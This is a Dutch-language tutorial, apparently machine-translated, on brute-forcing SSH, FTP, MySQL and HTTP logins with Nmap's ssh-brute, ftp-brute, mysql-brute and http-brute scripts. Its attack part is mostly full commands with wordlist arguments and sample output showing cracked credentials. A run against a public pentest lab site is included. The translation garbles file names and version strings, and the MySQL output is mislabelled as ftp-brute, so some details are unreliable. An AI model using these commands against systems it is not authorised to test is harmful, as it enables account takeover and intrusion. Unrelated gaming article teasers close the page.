Nmap

Wachtwoord Brute-forcing met Nmap

Wachtwoord Brute-forcing met Nmap
Voor brute-force online services gebruiken mensen normaal gesproken Hydra, Medusa en Metasploit Framework, maar Nmap kan ook worden gebruikt om veel online services bruut te forceren. Er zijn ingebouwde Nmap-scripts die FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP en andere verschillende services ondersteunen. U kunt ook brute-force HTTP-formuliergebaseerde, basis- en digest-authenticatiemethoden gebruiken. Als je Nmap hebt geïnstalleerd, kun je deze scripts zien in de map "/usr/share/nmap/scripts".

[e-mail beveiligd]:~$ sudo apt update && sudo apt upgrade
[e-mail beveiligd]:~$ sudo apt install nmap -y
[e-mail beveiligd]:~$ cd /usr/share/nmap/scripts/
[e-mail beveiligd]:~$ ls *brute*

In deze tutorial zullen we onderzoeken hoe we Nmap kunnen gebruiken voor een brute-force aanval.

SSH brute kracht

SSH is een veilig protocol voor extern beheer en ondersteunt openssl en wachtwoordgebaseerde authenticatie. Om op SSH-wachtwoord gebaseerde authenticatie brute-forceren, kunnen we "ssh-brute" gebruiken.nse” Nmap-script.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls *ssh*brute*
ssh bruut.nse

Geef gebruikersnaam en wachtwoordlijst door als argument aan Nmap.

[e-mail beveiligd]:~$ nmap --script ssh-brute -p22 192.168.43.181
--script-args userdb=gebruikers.txt,passdb=wachtwoorden.tekst
Nmap 7 . starten.70 ( https://nmap.org ) op 2020-02-08 17:09 PKT
Nmap-scanrapport voor 192.168.43.181
Host is up (0.00033s latentie).
HAVEN   STAATSSERVICE
22/tcp open ssh
| ssh-brute:
| rekeningen:
| admin:p4ssw0rd - Geldige inloggegevens
|_  Statistieken: 99 gissingen uitgevoerd in 60 seconden, gemiddelde tps: 1.7
Nmap klaar: 1 IP-adres (1 host omhoog) gescand in 60.17 seconden

FTP brute kracht

FTP is een File Transfer Protocol dat op wachtwoord gebaseerde authenticatie ondersteunt. Om FTP bruut te forceren, gebruiken we "ftp-brute".nse” Nmap-script.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls *ftp*brute*
ftp-brute.nse

Geef gebruikersnaam en wachtwoordlijst door als argument aan Nmap.

[email protected]:~$ nmap --script ftp-brute -p21 192.168.43.181 --script-args
userdb=gebruikers.txt,passdb=wachtwoorden.tekst
Nmap 7 . starten.70 ( https://nmap.org ) op 2020-02-08 16:51 PKT
Nmap-scanrapport voor 192.168.43.181
Host is up (0.00021s latentie).
HAVEN   STAATSSERVICE
21/tcp open ftp
| ftp-brute:
| rekeningen:
| admin:p4ssw0rd - Geldige inloggegevens
|_  Statistieken: 99 gissingen uitgevoerd in 20 seconden, gemiddelde tps: 5.0
Nmap klaar: 1 IP-adres (1 host omhoog) gescand in 19.50 seconden

MYSQL brute kracht

Soms wordt MySQL opengelaten voor externe verbindingen en kan iedereen er verbinding mee maken. Het wachtwoord kan worden gekraakt met Nmap met het script "mysql-brute".

[email protected]:~$ sudo nmap --script mysql-brute -p3306 192.168.43.181
--script-args userdb=gebruikers.txt, passdb=wachtwoorden.tekst
Nmap 7 . starten.70 ( https://nmap.org ) op 2020-02-08 16:51 PKT
Nmap-scanrapport voor 192.168.43.181
Host is up (0.00021s latentie).
HAVEN   STAATSSERVICE
3306/tcp open mysql
| ftp-brute:
| rekeningen:
| admin:p4ssw0rd - Geldige inloggegevens
|_  Statistieken: 99 gissingen uitgevoerd in 20 seconden, gemiddelde tps: 5.0
Nmap klaar: 1 IP-adres (1 host omhoog) gescand in 19.40 seconden

HTTP brute kracht

HTTP gebruikt drie soorten authenticatie om gebruikers te authenticeren bij webservers. Deze methodieken worden gebruikt in routers, modems en geavanceerde webapplicaties om gebruikersnamen en wachtwoorden uit te wisselen. Deze soorten zijn:

Basisverificatie

In het HTTP-basisauthenticatieprotocol codeert de browser gebruikersnaam en wachtwoord met base64 en verzendt deze onder de kop "Autorisatie". Je kunt dit zien in de volgende schermafbeelding.

Autorisatie: Basis YWRtaW46YWRtaW4=

U kunt base64 deze string decoderen om de gebruikersnaam en het wachtwoord te zien

[email protected]:~$ echo YWRtaW46YWRtaW4= | base64 -d
beheerder: beheerder

HTTP-basisverificatie is onveilig omdat het zowel de gebruikersnaam als het wachtwoord in platte tekst verzendt. Elke man-in-the-middle-aanvaller kan het verkeer gemakkelijk onderscheppen en de string decoderen om het wachtwoord te krijgen.

Digest-verificatie

HTTP Digest-verificatie maakt gebruik van hashing-technieken om de gebruikersnaam en het wachtwoord te versleutelen voordat deze naar de server worden verzonden.

Hash1 = MD5 (gebruikersnaam: rijk: wachtwoord)
Hash2=MD5(methode: digestURI)
response=MD5(Hash1: nonce: nonceCount: cnonce: qop: Hash2)

U kunt deze waarden zien onder de kop "Autorisatie".

Op Digest gebaseerde authenticatie is veilig omdat het wachtwoord niet in platte tekst wordt verzonden. Als een Man-in-the-Middle-aanvaller het verkeer onderschept, kan hij het wachtwoord in platte tekst niet krijgen.

Op formulieren gebaseerde authenticatie

Basis- en Digest-verificaties ondersteunen alleen de overdracht van gebruikersnaam en wachtwoord, terwijl op formulier gebaseerde verificatie kan worden aangepast op basis van de behoeften van de gebruiker. U kunt uw eigen webpagina in HTML of JavaScript bouwen om uw eigen coderings- en overdrachtstechnieken toe te passen.

Gewoonlijk worden gegevens in op formulier gebaseerde authenticatie verzonden in platte tekst. Voor beveiligingsproblemen moeten HTTP's worden toegepast om Man-in-the-Middle-aanvallen te voorkomen.

We kunnen alle soorten HTTP-authenticatie bruut forceren met Nmap. We zullen daarvoor het script "http-brute" gebruiken.

ubuntu@ubuntu:/usr/share/nmap/script/$ ls *http*brute*
http-brute.nse

Om dit Nmap-script te testen, lossen we een openbaar gehoste brute-force-uitdaging op door pentester academy op deze URL http://pentesteracademylab.appspot.com/lab/webapp/basicauth.

We moeten alles, inclusief hostnaam, URI, aanvraagmethode en woordenboeken afzonderlijk opgeven als scriptargument.

[email protected]:~$ sudo nmap -p80 --script http-brute pentesteracademylab.appspot.com
--script-args http-brute.hostnaam=pentesteracademylab.appspot.com,
http-brute.path=/lab/webapp/basicauth, userdb=gebruikers.txt, passdb=wachtwoorden.tekst,
http-brute.methode=POST
 
Nmap 7 . starten.70 ( https://nmap.org ) op 2020-02-08 21:37 PKT
Nmap-scanrapport voor pentesteracademylab.appspot.com (216.58.210.84)
Host is up (0.20s latentie).
Andere adressen voor pentesteracademylab.appspot.com (niet gescand): 2a00:1450:4018:803::2014
rDNS-record voor 216.58.210.84: mct01s06-in-f84.1e100.netto-
 
HAVEN   STAATSSERVICE
80/tcp openen  http
| http-brute:
| rekeningen:
| admin:aaddd - Geldige inloggegevens
|_  Statistieken: 165 keer geraden in 29 seconden, gemiddelde tps: 5.3
Nmap klaar: 1 IP-adres (1 host omhoog) gescand in 31.22 seconden

Conclusie

Nmap kan worden gebruikt om veel dingen te doen, ondanks het eenvoudig scannen van poorten. Het kan Metasploit, Hydra, Medusa en veel andere tools vervangen die speciaal zijn gemaakt voor online brute forcing. Nmap heeft eenvoudige, gebruiksvriendelijke ingebouwde scripts die bijna elke service brute-forceren, inclusief HTTP, TELNEL, SSH, MySQL, Samba en andere.

Top 5 Game Capture-kaarten
We hebben allemaal gezien en genoten van streaming gameplays op YouTube. PewDiePie, Jakesepticye en Markiplier zijn slechts enkele van de beste gamers...
Hoe een spel op Linux te ontwikkelen
Tien jaar geleden zouden niet veel Linux-gebruikers voorspellen dat hun favoriete besturingssysteem ooit een populair spelplatform voor commerciële vi...
Open source-poorten van commerciële game-engines
Gratis, open source en platformonafhankelijke game-engine-recreaties kunnen worden gebruikt om zowel oude als enkele van de vrij recente gametitels te...